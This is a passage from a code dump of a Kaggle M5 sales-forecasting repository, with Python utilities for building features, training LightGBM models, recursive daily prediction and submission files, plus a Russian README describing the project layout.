abt\n partial_abts = []\n for store_id in store_ids:\n partial_abt = pd.read_pickle(f'./work/abt_{store_id}.pkl')\n features = get_features(partial_abt, fcst_horizon)\n partial_abt = partial_abt[features]\n # apply by_variable filter\n partial_abt = partial_abt[partial_abt[by_variable] == encoder.mapping[by_variable][value]]\n # filter dates\n partial_abt = partial_abt[partial_abt['day'] >= fcst_date - history_length]\n partial_abt = partial_abt[partial_abt['day'] < fcst_date + 28]\n # filter start of every TS\n partial_abt = partial_abt[partial_abt['history_length'] >= history_start]\n\n partial_abts.append(partial_abt)\n abt = pd.concat(partial_abts)\n print('abt is successfully gathered')\n partial_abts = None\n partial_abt = None\n gc.collect()\n # if fcst_horizon == 4:\n # with open(f'./work/abt_{fcst_horizon}_{state_id}.pkl', 'rb') as handle:\n # abt = pickle.load(handle)\n # else:\n # raise ValueError('Forecast horizons other than 4 not implemented yet')\n if 'Unnamed: 0' in abt.columns:\n abt.drop('Unnamed: 0', axis=1, inplace=True)\n # 2. filter according to state_id\n # abt = abt[encoder.decode(abt, 'state_id') == state_id]\n\n for feature in cat_feats:\n abt[feature] = abt[feature].astype('category')\n \n # 3. separate into train and test\n\n if 'use_scaling' in parameters.keys() and parameters['use_scaling'] == 1:\n print(\"Scaling is used because parameter 'use_scaling' was set to 1\")\n # get average sales for every TS over last year\n qty_scaling = abt.loc[abt['day'] == fcst_date + fcst_horizon * 7 - 6, ['item_id', 'store_id', 'qty_mean_lastyear']]\n qty_scaling.rename(columns={'qty_mean_lastyear':'qty_scaling'}, inplace=True)\n qty_scaling.set_index(['item_id', 'store_id'], inplace=True)\n qty_scaling.loc[qty_scaling['qty_scaling'] < 1/364, 'qty_scaling'] = 1\n qty_scaling = abt[['item_id','store_id']].join(qty_scaling, on=['item_id', 'store_id'])\n abt['qty_scaling'] = qty_scaling['qty_scaling']\n qty_scaling = None\n gc.collect()\n for feature in ['qty_mean_lastweek', 'qty_mean_lastmonth', 'qty_mean_lastyear', 'qty_std_lastyear', 'qty']:\n abt[feature] = abt[feature] / abt['qty_scaling']\n else:\n print('Scaling is not used')\n\n y_train = abt.loc[abt['day'] < fcst_date, 'qty']\n X = abt.drop(['qty'], axis=1)\n X_train = X[X['day'] < fcst_date]\n X_test = X[X['day'] >= fcst_date]\n\n # 4. convert to lgbm dataset\n if 'use_weights' in parameters.keys() and parameters['use_weights'] == 1:\n weights = get_weights_for_abt(X_train, fcst_date)\n print('Weighting is used')\n else:\n print('Weighting is not used')\n\n print(f'Train data shape: {X_train.shape}')\n if 'use_weights' in parameters.keys() and parameters['use_weights'] == 1:\n train_data = lgb.Dataset(X_train, label = y_train, weight = weights, categorical_feature=cat_feats, free_raw_data=True)\n else:\n train_data = lgb.Dataset(X_train, label = y_train, categorical_feature=cat_feats, free_raw_data=True)\n # 4. train\n model = lgb.train(parameters['lgbm_params'], train_data)\n # 5. make prediction\n X_test['predict'] = model.predict(X_test)\n if 'use_scaling' in parameters.keys() and parameters['use_scaling'] == 1:\n X_test['predict'] = X_test['predict'] * X_test['qty_scaling']\n cat_columns = ['item_id', 'dept_id', 'cat_id', 'store_id', 'state_id']\n columns = cat_columns + ['day', 'predict']\n prediction = X_test[columns]\n for column in cat_columns:\n prediction.loc[:, column] = encoder.decode(prediction, column)\n\n # 6. save model and prediction\n name = f'{model_id}_{month}_{value}'\n model.save_model(\"./work/\" + name + \".lgb\")\n predictions.append(prediction)\n i += 1\n \n predictions = pd.concat(predictions)\n name = f'{model_id}_{month}'\n predictions.to_csv('./forecasts/pred_' + name + '.csv', index=False)\n print('Model evaluation complete')\n pass\n\ndef get_val_fcst(model_id):\n evaluate_model(model_id, months=[0])\n pass\n\ndef prepare_val_submission(model_id):\n df = pd.read_csv(f'./forecasts/pred_{model_id}_0.csv')\n df['id'] = df['item_id'] + '_' + df['store_id'] + '_validation'\n df = df[['id', 'day','predict']]\n df['day'] = df['day'] - 1913\n df['day'] = 'F' + df['day'].astype(str)\n df = df.pivot(index='id', columns='day', values='predict')\n df =df[[f'F{x}' for x in range(1,29)]]\n example = pd.read_csv('./data/sample_submission.csv')\n submission = example[['id']].join(df, on='id').fillna(0)\n submission.to_csv(f'./submissions/{model_id}.csv', index=False)\n pass\n\ndef prepare_val_weights():\n weights = pd.read_csv('./data/weights_validation.csv')\n weights = weights[weights['Level_id']=='Level12'].rename(columns={'Agg_Level_1':'item_id', 'Agg_Level_2':'store_id','Weight':'weight'})[['item_id','store_id','weight']]\n weights.to_csv('./work/validation_weights.csv', index=False)\n\ndef get_weights_for_abt(abt, fcst_date):\n history = load_history(fcst_date)\n denominator = get_rmsse_denominator(history, fcst_date)\n history['denominator'] = denominator\n history = history[['item_id','store_id','denominator']]\n history.set_index(['item_id','store_id'], inplace=True)\n\n weights = pd.read_csv('./work/validation_weights.csv')\n weights = weights.join(history, on=['item_id','store_id'])\n\n mask = (weights['weight'] != 0)\n weights['weight2'] = 0\n weights.loc[mask, 'weight2'] = weights.loc[mask, 'weight'] / np.sqrt(weights.loc[mask, 'denominator'])\n\n encoder = load_encoder()\n # encode to join with abt\n for column in ['store_id','item_id']:\n weights[column] = encoder.encode(weights, column)\n # add weight to abt\n weights.set_index(['store_id','item_id'], inplace=True)\n weights = weights[['weight2']]\n weights = weights * len(weights) / weights.sum() # rescale weights\n weights = abt[['store_id','item_id']].join(weights,on=['store_id','item_id'])\n return np.array(weights['weight2'])\n\n# error calculation\ndef get_rmsse_denominator(history, fcst_date):\n # denominator in error calculation\n # calculate squared differences fron n=1 to fcst_date\n tmp = np.array(history[range(1, fcst_date)])\n tmp = tmp[:, 1:] - tmp[:, : -1]\n tmp = tmp ** 2\n # create mask matrix\n mask = np.array(history[range(1, fcst_date)])\n mask = np.cumsum(mask, axis=1)\n mask = (mask > 0)\n # multiply by mask = {0,1}\n tmp = tmp * mask[:, 1:]\n # sum\n tmp = tmp.sum(axis=1)\n # divide by coefficient\n first_sale = (mask == 0).sum(axis=1)\n tmp = tmp / (fcst_date - 1 - 1 - first_sale)\n return tmp\n\ndef load_history(fcst_date):\n history = read_train()\n cols_cat = [x for x in history.columns if not x.startswith('d_')]\n cols_qty = [int(x[2:]) for x in history.columns if x.startswith('d_')]\n history.columns = cols_cat + cols_qty\n cols_qty = [x for x in cols_qty if x < fcst_date + 28]\n history = history[cols_cat + cols_qty]\n history.set_index('id', inplace=True)\n return history\n\ndef get_features(abt, fcst_horizon=4):\n columns_all = ['qty', 'item_id','dept_id','cat_id','store_id','state_id','day','week','year','wm_yr_wk','month','wday']\n columns_all += ['history_length', 'dayofyear','snap']\n columns_all += ['event_name_cultural', 'event_name_sporting', 'event_name_national', 'event_name_religious']\n columns_all += ['days_till_next_cultural', 'days_till_next_sporting', 'days_till_next_national', 'days_till_next_religious']\n columns_all += ['price_mean_month', 'sell_price', 'price_mean_ratio_week_to_month']\n\n # лаги все что можно\n columns_lag = [x for x in abt.columns if x.startswith('lag') and int(x.split('_')[-1]) >= fcst_horizon * 7]\n\n # qty_sum_7 все что можно\n columns_qty = [x for x in abt.columns if x.startswith('qty') and x !='qty']\n columns_qty = [x for x in columns_qty if (int(x.split('_')[-1]) == fcst_horizon * 7) or (int(x.split('_')[-1]) > fcst_horizon * 7 and x.startswith('qty_sum_7'))]\n\n # abt.drop(columns_all, axis=1).info()\n columns_keep = columns_all + columns_lag + columns_qty\n return columns_keep\n\ndef load_summary():\n summary = pd.read_pickle('./work/summary.pkl')\n return summary\n\nif __name__ == \"__main__\":\n pass\n" }, { "alpha_fraction": 0.4600583016872406, "alphanum_fraction": 0.4991253614425659, "avg_line_length": 25.589147567749023, "blob_id": "10a491ac1bfed8e3cc4bb28b0ccb4b34721172fd", "content_id": "916c846d2835a88e9606725dc3ac83c643d3592b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3430, "license_type": "no_license", "max_line_length": 91, "num_lines": 129, "path": "/step_recursive.py", "repo_name": "poanse/m5-forecasting-accuracy", "src_encoding": "UTF-8", "text": "from utils import *\nfrom utils_recursive import *\n\n\n# parameters = {\n# 'fcst_horizon' : None,\n# 'history_length' : 730,\n# 'history_start' : 35,\n# 'recursive' : True,\n# 'by_variable' : 'cat_id',\n# 'remove_features' : ['lag1', 'lag7', 'id'],\n# 'lgbm_params':{\n# \"objective\" : \"poisson\",\n# \"metric\" :\"rmse\",\n# \"force_row_wise\" : True,\n# \"learning_rate\" : 0.05,\n# \"sub_feature\" : 0.5,\n# \"sub_row\" : 0.75,\n# \"bagging_freq\" : 1,\n# \"lambda_l2\" : 0.1,\n# 'verbosity': 1,\n# 'num_iterations' : 300,\n# 'num_leaves': 16,\n# \"min_data_in_leaf\": 100,\n# 'seed': 0,\n# 'n_jobs': -1\n# }\n# }\n\n# add_model(parameters)\n# model_id = get_model_id(parameters)\n# train_model_recursive(model_id, months=[0])\n# predict_and_prepare_submit_recursive(model_id, month=0)\n\n\n\n# parameters = {\n# 'fcst_horizon' : None,\n# 'history_length' : 730,\n# 'history_start' : 35,\n# 'recursive' : True,\n# 'by_variable' : 'cat_id',\n# 'remove_features' : ['lag1', 'lag7', 'id', 'cat_id'],\n# 'lgbm_params':{\n# \"objective\" : \"poisson\",\n# \"metric\" :\"rmse\",\n# \"force_row_wise\" : True,\n# \"learning_rate\" : 0.05,\n# \"sub_feature\" : 0.5,\n# \"sub_row\" : 0.75,\n# \"bagging_freq\" : 1,\n# \"lambda_l2\" : 0.1,\n# 'verbosity': 1,\n# 'num_iterations' : 600,\n# 'num_leaves': 63,\n# \"min_data_in_leaf\": 500,\n# 'seed': 0,\n# 'n_jobs': -1\n# }\n# }\n\n# add_model(parameters)\n# model_id = get_model_id(parameters)\n# train_model_recursive(model_id, months=[0])\n# predict_and_prepare_submit_recursive(model_id, month=0)\n\n\n\n# parameters = {\n# 'fcst_horizon' : None,\n# 'history_length' : 730,\n# 'history_start' : 35,\n# 'recursive' : True,\n# 'by_variable' : 'cat_id',\n# 'remove_features' : ['lag1', 'lag7','lag14','year','first_sale_day', 'id', 'cat_id'],\n# 'lgbm_params':{\n# \"objective\" : \"poisson\",\n# \"metric\" :\"rmse\",\n# \"force_row_wise\" : True,\n# \"learning_rate\" : 0.05,\n# \"sub_feature\" : 0.5,\n# \"sub_row\" : 0.75,\n# \"bagging_freq\" : 1,\n# \"lambda_l2\" : 0.1,\n# 'verbosity': 1,\n# 'num_iterations' : 600,\n# 'num_leaves': 2**8 - 1,\n# \"min_data_in_leaf\": 500,\n# 'seed': 0,\n# 'n_jobs': 2\n# }\n# }\n\n# add_model(parameters)\n# model_id = get_model_id(parameters)\n# train_model_recursive(model_id, months=[0])\n# predict_and_prepare_submit_recursive(model_id, month=0)\n\n\nparameters = {\n 'fcst_horizon' : None,\n 'history_length' : 730,\n 'history_start' : 35,\n 'recursive' : True,\n 'by_variable' : 'cat_id',\n 'remove_features' : ['year','first_sale_day', 'id', 'cat_id'],\n 'lgbm_params':{\n \"objective\" : \"poisson\",\n \"metric\" :\"rmse\",\n \"force_row_wise\" : True,\n \"learning_rate\" : 0.05,\n \"sub_feature\" : 0.5,\n \"sub_row\" : 0.75,\n \"bagging_freq\" : 1,\n \"lambda_l2\" : 0.1,\n 'verbosity': 1,\n 'num_iterations' : 600,\n 'num_leaves': 2**9 - 1,\n \"min_data_in_leaf\": 500,\n 'seed': 0,\n 'n_jobs': -1\n }\n}\n\n# add_model(parameters)\n# model_id = get_model_id(parameters)\nmodel_id = \"0029\"\ntrain_model_recursive(model_id, months=[-1])\npredict_and_prepare_submit_recursive(model_id, month=-1)\n" }, { "alpha_fraction": 0.7857142686843872, "alphanum_fraction": 0.7895545363426208, "avg_line_length": 53.25, "blob_id": "146ec28f1066da1ec5b117d0afc36c3b7e69da05", "content_id": "33aeeecbb28c7753bdcbc7f55308587b2520e01d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2017, "license_type": "no_license", "max_line_length": 195, "num_lines": 24, "path": "/README.md", "repo_name": "poanse/m5-forecasting-accuracy", "src_encoding": "UTF-8", "text": "# m5-forecasting-accuracy\n\n[Соревнование на Kaggle по прогнозированию продаж WALMART](https://www.kaggle.com/c/m5-forecasting-accuracy/overview)\n\n## Содержание репозитория:\n\n*fcst_weekly.ipynb* - понедельный прогноз.\n\n*disagg_coefs.ipynb* - дизагрегация понедельного прогноза до подневного: для каждого месяца считалась доля понедельников, вторников и тд в суммарных продажах.\nЗаброшена из-за сложного распределения продаж между днями недели, в том числе плохо учитывались snap дни.\n\n*fcst_daily.ipynb* - подневный прогноз.\n\nЗатем было решено организовать работу следующим образом:\n1) Функции для создание витрины с фичами находятся в *utils.py*\n2) Запуск обучения модели происходит в скрипте *step.py*, где parameters - конфиг (dict) с lgbm-параметрами, разрезом (по штатам и/или департаментам и тп) и др.\n * add_model(parameters)\n * model_id = get_model_id(parameters)\n * evaluate_model(model_id)\n * get_val_fcst(model_id)\n * prepare_val_submission(model_id)\n3) Информация об использованных моделях хранится в *master.csv*, где планировалось также хранить ошибку прогноза за различные периоды\n\nТакже был использован рекурсивный подход к прогнозированию (который показал более высокую точность в публичном рейтинге) с аналогичной структурой: файлы *step_recursive.py* и *utils_recursive.py*\n" }, { "alpha_fraction": 0.5890864729881287, "alphanum_fraction": 0.6110596656799316, "avg_line_length": 43.912471771240234, "blob_id": "2c7932dfe4bd00637342eaee8915faa8d9eb0a8a", "content_id": "d7f76ac04ab2f58e21fab955dfe9a5ec0edbc88e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 20843, "license_type": "no_license", "max_line_length": 164, "num_lines": 457, "path": "/utils_recursive.py", "repo_name": "poanse/m5-forecasting-accuracy", "src_encoding": "UTF-8", "text": "from utils import *\nfrom tqdm import tqdm\n\ndef load_prices_pivot(fcst_date=None, history_length=730, value_filter={}):\n start_day = fcst_date - history_length - 364\n ### prepare calendar data to join with prices\n cal = read_calendar()\n cal['day'] = cal['d'].apply(lambda x: int(x[2:])).astype('uint16')\n cal.drop('d', axis=1,inplace=True)\n # filter\n cal = cal[['wm_yr_wk', 'day']].set_index('day')\n cal = cal.loc[start_day:, :]\n cal.reset_index(inplace=True)\n cal.set_index('wm_yr_wk', inplace=True)\n \n ### load summary to apply filter\n encoder = load_encoder()\n summary = load_summary()\n if value_filter:\n for key, values in value_filter.items():\n if type(values) != list:\n values = [values]\n summary = summary[summary[key].isin(values)]\n ids = encoder.encode(summary, 'id') # list of filtered ids\n summary = None\n \n ### prices\n prices = read_prices()\n # add id, remove item and store\n prices['id'] = prices['item_id'] + '_' + prices['store_id'] + '_validation'\n prices.drop(['item_id', 'store_id'],axis=1,inplace=True)\n # encode and filter id\n prices['id'] = encoder.encode(prices, 'id')\n prices = prices[prices['id'].isin(ids)]\n # join with cal\n prices = prices.join(cal, on='wm_yr_wk')\n prices.dropna(subset=['day'], inplace=True)\n # change 'day' and 'sell_price' to int, remove week number\n prices['sell_price'] = prices['sell_price'].astype('uint16')\n prices['day'] = prices['day'].astype('uint16')\n prices.drop('wm_yr_wk', axis=1, inplace=True)\n # transform table from long to wide\n prices = prices.pivot(index='id', columns='day',values='sell_price')\n # deal with missing prices\n prices = prices.ffill(axis=1).bfill(axis=1)\n prices = prices.loc[:, : fcst_date + 27]\n return prices\n\n\ndef create_price_features(prices, fcst_date=1914, history_length=730):\n ### создание фичей\n # 1. средняя цена за неделю (шифт 1)\n price_mean_7 = prices.rolling(7, axis=1).mean().shift(1, axis=1).loc[:, fcst_date - history_length :]\n # 2. средняя цена за месяц (шифт 1)\n price_mean_28 = prices.rolling(28, axis=1).mean().shift(1, axis=1).loc[:, fcst_date - history_length :]\n # 3. относительная волатильность цены за год\n price_rstd_364 = (prices.rolling(364, axis=1).std().shift(1, axis=1) / prices.rolling(364, axis=1).mean().shift(1, axis=1)).loc[:, fcst_date - history_length :]\n \n ### сбор фичей\n prices = prices.loc[:, fcst_date - history_length :]\n columns = list(prices.columns)\n\n prices.reset_index(inplace=True)\n prices = pd.melt(prices, id_vars=['id'], value_vars=columns, value_name='sell_price')\n\n dfs = [price_mean_7, price_mean_28, price_rstd_364]\n cols = ['price_mean_7', 'price_mean_28', 'price_rstd_364']\n for df, column in zip(dfs, cols):\n df.reset_index(inplace=True)\n df = pd.melt(df, id_vars=['id'], value_vars=columns, value_name=column)\n df.set_index(['id', 'day'], inplace=True)\n df = prices[['id', 'day']].join(df, on= ['id', 'day'])\n prices[column] = df[column].values\n prices[column] = prices[column].astype('float32')\n df = None\n \n for column in ['id' ,'day','sell_price']:\n prices[column] = prices[column].astype('uint16')\n \n prices['price_ratio_sellprice_to_mean7'] = (prices['sell_price'] / prices['price_mean_7']).astype('float32')\n prices['price_ratio_sellprice_to_mean28'] = (prices['sell_price'] / prices['price_mean_28']).astype('float32')\n prices['price_ratio_mean7_to_mean28'] = (prices['price_mean_7'] / prices['price_mean_28']).astype('float32')\n return prices\n\n\ndef create_features_in_batches(df, function, fcst_date=None, history_length=730, n_batches=20):\n batchsize = int((df.shape[0] + 1)/ n_batches) + 1\n features = []\n for i in tqdm(range(n_batches)):\n batch = df.iloc[batchsize * i : batchsize * (i + 1)]\n features.append(function(batch, fcst_date=fcst_date, history_length=history_length))\n features = pd.concat(features)\n features.reset_index(drop=True, inplace=True)\n return features\n\n\ndef load_sales_pivot(fcst_date=None, history_length=730, value_filter={}):\n # load data\n sales = read_train()\n # apply value_filter\n if value_filter:\n for key, values in value_filter.items():\n if type(values) != list:\n values = [values]\n sales = sales[sales[key].isin(values)]\n # drop categorical columns\n sales.drop(['item_id', 'store_id', 'dept_id', 'cat_id', 'state_id'],axis=1,inplace=True)\n # encode id\n encoder = load_encoder()\n sales['id'] = encoder.encode(sales, 'id')\n sales.set_index('id', inplace=True)\n # add fcst days\n for day in range(fcst_date, fcst_date + 28):\n sales[f'd_{day}'] = 0\n sales[f'd_{day}'] = sales[f'd_{day}'].astype('uint16')\n # convert days from str to int and filter\n sales.columns = [int(x[2:]) for x in sales.columns]\n start_day = fcst_date - history_length - 364\n sales = sales.loc[:, start_day:]\n sales.sort_index(inplace=True)\n return sales\n\ndef create_sales_features(sales, fcst_date=None, history_length=730):\n ### создание фичей\n # 0. day of the first sale\n first_sale = ((sales.loc[:, 1:].copy().cumsum(axis=1) == 0).sum(axis=1) + 1).astype('uint16')\n first_sale = pd.DataFrame(first_sale).reset_index().rename(columns={'index':'id', 0:'first_sale_day'}).set_index('id')\n # 1. средние продажи за неделю (шифт 1)\n sales_mean_7 = sales.rolling(7, axis=1).mean().shift(1, axis=1).loc[:, fcst_date - history_length :]\n # 2. средние продажи за месяц (шифт 1)\n sales_mean_28 = sales.rolling(28, axis=1).mean().shift(1, axis=1).loc[:, fcst_date - history_length :]\n # 3. средние продажи за год (шифт 1)\n sales_mean_364 = sales.rolling(364, axis=1).mean().shift(1, axis=1).loc[:, fcst_date - history_length :]\n # 4. относительная волатильность продаж за месяц\n sales_rstd_28 = sales.rolling(28, axis=1).std().shift(1, axis=1).loc[:, fcst_date - history_length :]\n sales_rstd_28 = sales_rstd_28 / sales_mean_28\n sales_rstd_28[sales_rstd_28 == np.inf] = 0\n # 5. относительная волатильность продаж за год\n sales_rstd_364 = sales.rolling(364, axis=1).std().shift(1, axis=1).loc[:, fcst_date - history_length :]\n sales_rstd_364 = sales_rstd_364 / sales_mean_364\n sales_rstd_364[sales_rstd_364 == np.inf] = 0\n # 6. медианные продажи за месяц\n sales_median_28 = sales.rolling(28, axis=1).median().shift(1, axis=1).loc[:, fcst_date - history_length :]\n # 7. медианные продажи за год\n sales_median_364 = sales.rolling(364, axis=1).median().shift(1, axis=1).loc[:, fcst_date - history_length :]\n \n # lags\n lags = [1, 6, 7, 13, 14, 20, 21, 28, 42, 49, 64, 65, 364, 365]\n cols_lags = ['lag' + str(x) for x in lags]\n lag_dfs = []\n for lag in lags:\n lag_dfs.append(sales.shift(lag, axis=1).loc[:, fcst_date - history_length :])\n\n ### сбор фичей\n sales = sales.loc[:, fcst_date - history_length :]\n columns = list(sales.columns)\n\n sales.reset_index(inplace=True)\n sales = pd.melt(sales, id_vars=['id'], value_vars=columns, var_name='day', value_name='sales')\n \n # add first sale day\n sales = sales.join(first_sale, on='id')\n \n # add sales features\n dfs = [sales_mean_7, sales_mean_28, sales_mean_364, sales_rstd_28, sales_rstd_364, sales_median_28, sales_median_364]\n dfs = dfs + lag_dfs\n cols = ['sales_mean_7', 'sales_mean_28', 'sales_mean_364', 'sales_rstd_28', 'sales_rstd_364', 'sales_median_28', 'sales_median_364']\n cols = cols + cols_lags\n for df, column in zip(dfs, cols):\n df.reset_index(inplace=True)\n df = pd.melt(df, id_vars=['id'], value_vars=columns, var_name='day',value_name=column)\n df.set_index(['id', 'day'], inplace=True)\n df = sales[['id', 'day']].join(df, on= ['id', 'day'])\n sales[column] = df[column].values\n if column.startswith('lag'):\n # sales[column] = sales[column].astype('uint16')\n sales[column] = sales[column].astype('float32')\n else:\n sales[column] = sales[column].astype('float32')\n df = None\n \n for column in ['id' ,'day','sales']:\n sales[column] = sales[column].astype('uint16')\n \n sales['sales_ratio_mean7_to_mean28'] = (sales['sales_mean_7'] / sales['sales_mean_28']).astype('float32')\n sales['sales_ratio_mean7_to_mean364'] = (sales['sales_mean_7'] / sales['sales_mean_364']).astype('float32')\n sales['sales_ratio_mean28_to_mean364'] = (sales['sales_mean_28'] / sales['sales_mean_364']).astype('float32')\n \n sales.fillna(0, inplace=True)\n # add history length\n sales['history_length'] = (sales['day'] - sales['first_sale_day']).astype('uint16')\n return sales\n\n\ndef create_features_events():\n calendar = read_calendar()\n calendar['dayofyear'] = (calendar['date'].dt.dayofyear).astype('uint16')\n calendar['day'] = calendar['d'].apply(lambda x: int(x[2:]))\n \n # divide events into separate columns by type\n for event_type in calendar['event_type_1'].dropna().unique():\n event_name_bytype = []\n for _, row in calendar.iterrows():\n if row['event_type_1'] == event_type:\n event_name_bytype.append(row['event_name_1'])\n elif row['event_type_2'] == event_type:\n event_name_bytype.append(row['event_name_2'])\n else:\n event_name_bytype.append(np.nan)\n event_type = event_type.lower()\n calendar[f'event_name_{event_type}'] = event_name_bytype\n\n calendar.drop(['event_name_1', 'event_name_2', 'event_type_1', 'event_type_2'], axis=1, inplace=True)\n calendar.fillna(method='backfill', inplace=True)\n\n for column in ['event_name_cultural', 'event_name_sporting', 'event_name_national', 'event_name_religious']:\n tmp = calendar[['year', column, 'day']].groupby(['year', column]).max().rename(columns={'day':'maxday'})\n dtmp = calendar[['year', column]].join(tmp, on=['year', column])\n calendar['maxday'] = dtmp['maxday'].values\n calendar[\"days_till_next_{}\".format(column.split('_')[2])] = calendar['maxday'] - calendar['day']\n calendar.drop('maxday', axis=1, inplace=True)\n\n calendar['event_name_religious'].fillna('Eid al-Fitr', inplace=True)\n feature = 'days_till_next_religious'\n days = calendar[calendar[feature].isna()].index\n calendar.loc[days, feature] = calendar.loc[days, 'date'].apply(lambda x: (pd.to_datetime('2016-07-07') - x).days)\n \n for feature in ['event_name_national', 'days_till_next_national']:\n days = calendar.loc[calendar[feature].isna(), 'day'].values\n days = [x - 365 for x in days]\n calendar.loc[calendar[feature].isna(), feature] = calendar.loc[calendar['day'].isin(days), feature].values\n \n encoder = load_encoder()\n \n for column in ['event_name_cultural', 'event_name_sporting', 'event_name_national', 'event_name_religious']:\n calendar[column] = encoder.encode(calendar, column)\n calendar[column] = calendar[column].astype('uint8')\n for column in ['days_till_next_cultural', 'days_till_next_sporting', 'days_till_next_national', 'days_till_next_religious']:\n calendar[column] = calendar[column].astype('uint16')\n for column in ['wday', 'month', 'snap_CA', 'snap_TX', 'snap_WI']:\n calendar[column] = calendar[column].astype('uint8')\n for column in ['year', 'day']:\n calendar[column] = calendar[column].astype('uint16')\n \n calendar.drop(['date', 'd', 'wm_yr_wk', 'weekday'], axis=1, inplace=True)\n return calendar\n\n\ndef create_abt_recursive(fcst_date=None, value_filter={'cat_id' : 'FOODS'}, history_length=730, n_batches=20):\n print('Preparing price features...')\n prices = load_prices_pivot(fcst_date, history_length, value_filter)\n price_features = create_features_in_batches(prices, create_price_features, fcst_date, history_length, n_batches)\n\n print('Preparing sales features...')\n sales = load_sales_pivot(fcst_date=fcst_date, value_filter=value_filter)\n sales_features = create_features_in_batches(sales, create_sales_features, fcst_date, history_length, n_batches)\n\n print('Preparing event features...')\n event_features = create_features_events()\n print('Done')\n \n print('Preparing categorical features...')\n summary = load_summary()\n encoder = load_encoder()\n for col in summary.columns:\n summary[col] = encoder.encode(summary, col)\n print('Done')\n\n print('Combining features into abt ...')\n price_features = price_features.join(sales_features.set_index(['id', 'day']), on = ['id', 'day'])\n price_features = price_features.join(event_features.set_index('day'), on='day')\n price_features = price_features.join(summary.set_index('id'), on='id')\n # dropping useless features\n # price_features.drop(['id'], axis=1, inplace=True)\n print('Done')\n return price_features\n\n\ndef train_model_recursive(model_id, months=[0]):\n '''\n Trains lgbm model given parameters and outputs model and prediction\n '''\n parameters = get_model_parameters(model_id)\n if parameters['recursive'] != True:\n return False\n cat_feats = ['item_id', 'dept_id','store_id', 'cat_id', 'state_id']\n cat_feats = cat_feats + ['wday', 'month']\n cat_feats = cat_feats + ['event_name_cultural', 'event_name_sporting', 'event_name_national', 'event_name_religious']\n cat_feats = [x for x in cat_feats if x not in parameters['remove_features']]\n\n\n if 'by_variable' in list(parameters.keys()):\n by_variable = parameters['by_variable']\n else:\n by_variable = 'state_id'\n encoder = load_encoder()\n\n print(f'Models are divided by {by_variable}')\n values = list(encoder.mapping[by_variable].keys())\n print(values)\n\n history_length = parameters['history_length']\n history_start = parameters['history_start']\n i = 1\n for month in months:\n fcst_date = 1914 - 28 * month\n for value in values:\n print(f'Step {i} out of {len(values) * len(months)}')\n print(by_variable, ':', value)\n value_filter = {by_variable : value}\n \n ### load abt\n abtname = f'abt_recursive_{fcst_date}_{history_length}_{value}.pkl'\n if abtname not in os.listdir('./work'):\n # if abt is not in work - create new and save\n abt = create_abt_recursive(value_filter=value_filter, fcst_date=fcst_date, history_length=history_length, n_batches=100)\n abt.to_pickle(f'./work/{abtname}')\n else:\n # otherwise - load pickle\n abt = pd.read_pickle(f'./work/{abtname}')\n \n # abt.drop('id', axis=1, inplace=True)\n abt.drop(parameters['remove_features'], axis=1, inplace=True)\n abt = abt[abt['history_length'] >= history_start]\n \n# for feature in cat_feats:\n# abt[feature] = abt[feature].astype('category')\n \n # 3. separate into train and test\n y_train = abt.loc[abt['day'] < fcst_date, 'sales']\n X = abt.drop(['sales'], axis=1)\n X_train = X[X['day'] < fcst_date]\n # X_test = X[X['day'] >= fcst_date]\n\n # 4. convert to lgbm dataset\n print(f'Train data shape: {X_train.shape}')\n train_data = lgb.Dataset(X_train, label = y_train, categorical_feature=cat_feats, free_raw_data=True)\n val_data = lgb.Dataset(X_train.iloc[:1000], label = y_train[:1000], categorical_feature=cat_feats, free_raw_data=True)\n X_train = None\n # 5. train\n model = lgb.train(parameters['lgbm_params'], train_data, valid_sets = [val_data], verbose_eval=20)\n\n # 6. save model\n name = f'{model_id}_{month}_{value}'\n model.save_model(\"./work/\" + name + \".lgb\")\n i += 1\n print('Model training complete')\n pass\n\n\ndef update_features(abt, fcst_day):\n idx = (abt['day'] == fcst_day)\n ### columns to update\n ## lags\n for lag in [int(x[3:]) for x in abt.columns if x.startswith('lag')]:\n # new _values\n lag_col = abt.loc[abt['day'] == (fcst_day - lag), 'sales'].values\n # old values\n abt.loc[idx, f'lag{lag}'] = lag_col\n\n ## sales mean\n # for period in [7, 28, 364]:\n # # update mean as += lag1 / period\n # # old values\n # old_values = abt.loc[idx, f'sales_mean_{period}'].values\n # delta_values = abt.loc[idx, 'lag1'].values / period\n # new_values = old_values + delta_values\n # # update\n # abt.loc[abt['day'] == fcst_day, f'sales_mean_{period}'] = new_values\n\n # sales median and rstd and mean\n for period in [7, 28, 364]:\n day_range = range(fcst_day - period, fcst_day)\n # take last {period} values\n tmp = abt.loc[abt['day'].isin(day_range), ['sales', 'id', 'day']]\n # convert to pivot\n tmp = tmp.pivot(index='id', columns='day',values='sales')\n\n mean = tmp.mean(axis=1).values\n abt.loc[idx, f'sales_mean_{period}'] = mean\n if period != 7:\n # recalculate median and rstd\n median = tmp.median(axis=1).values\n rstd = tmp.std(axis=1).values / tmp.mean(axis=1).values\n # update\n abt.loc[idx, f'sales_median_{period}'] = median\n abt.loc[idx, f'sales_rstd_{period}'] = rstd\n\n # sales ratio\n abt.loc[idx, 'sales_ratio_mean7_to_mean28'] = abt.loc[idx, 'sales_mean_7'] / abt.loc[idx, 'sales_mean_28']\n abt.loc[idx, 'sales_ratio_mean7_to_mean364'] = abt.loc[idx, 'sales_mean_7'] / abt.loc[idx, 'sales_mean_364']\n abt.loc[idx, 'sales_ratio_mean28_to_mean364'] = abt.loc[idx, 'sales_mean_28'] / abt.loc[idx, 'sales_mean_364']\n return abt\n\n\ndef get_prediction_recursive(abt, m, model_id, fcst_date = 1914):\n abt = abt[abt['day'] >= fcst_date - 364]\n parameters = get_model_parameters(model_id)\n prediction = pd.DataFrame({})\n for fcst_day in tqdm(range(fcst_date, fcst_date + 28)):\n idx = (abt['day'] == fcst_day)\n # get forecast for next day\n dX = abt.loc[idx, :].drop(['sales'] + parameters['remove_features'], axis=1)\n pred = m.predict(dX)\n # write false history back to abt\n abt.loc[idx, 'sales'] = pred\n # save prediction\n d_pred = abt.loc[idx, ['id', 'sales']].rename(columns={'sales' : fcst_day}).set_index('id')\n if prediction.empty:\n prediction = d_pred\n else:\n prediction = prediction.join(d_pred, on='id')\n # update features\n if fcst_day != fcst_date + 28 - 1:\n abt = update_features(abt, fcst_day = fcst_day + 1)\n return prediction\n\n\n\ndef 